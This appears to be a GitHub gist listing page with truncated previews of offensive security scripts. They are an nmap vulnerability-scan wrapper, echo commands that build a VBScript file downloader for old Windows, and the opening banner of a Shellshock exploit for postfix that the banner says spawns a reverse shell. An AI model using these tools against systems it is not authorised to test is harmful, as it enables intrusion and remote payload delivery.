Skip to content

Instantly share code, notes, and snippets.

View YSSVirus's full-sized avatar
👋
Hacking

YSSVirus YSSVirus

👋
Hacking
View GitHub Profile
@YSSVirus
YSSVirus / Automated_Nmap_Vuln_Scan.sh
Created September 17, 2021 14:52
This is a simple nmap scan to do a vuln scan along with grabbing any extra info such as version os scan and more then saves it how ever you wish in the directory your in.
#!/bin/bash
echo "This script is also runable with arguments
sudo Nmap <host> <ports> <name_of_file_to_save_to>"
echo ""
echo ""
echo ""
if [ $# -eq 0 ]
then
echo "What host are you scanning?"
read Host
@YSSVirus
YSSVirus / Transfer-files-Windows-vista-and-up.txt
Last active September 17, 2021 14:57
this makes it so you are able to transfer files on extremely old windows
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
@YSSVirus
YSSVirus / Shellshock_SMTP_Exploit.py
Last active January 5, 2023 11:00
This is a shell shock exploit for smtp Post fix versions. The old script had a preset sender name i have made this a variable so its easily changeable because without that if you ctrl+c in a tab it clogs up the name making it unable to recieve new shell without reverting. This should make it alot easier! I also included rlwrap dependency on netc…
#!/usr/bin/python
import sys,socket,subprocess
bnr = '''
#####################################################################################
# postfix + procmail + formail ShellShock Exploit #
# Tested on: Debian 5 (postfix smtp,procmail) #
# By 3mrgnc3 06/02/2017 #
# CVE : 2014-6271 #
# Initiates a Reverse TCP connection #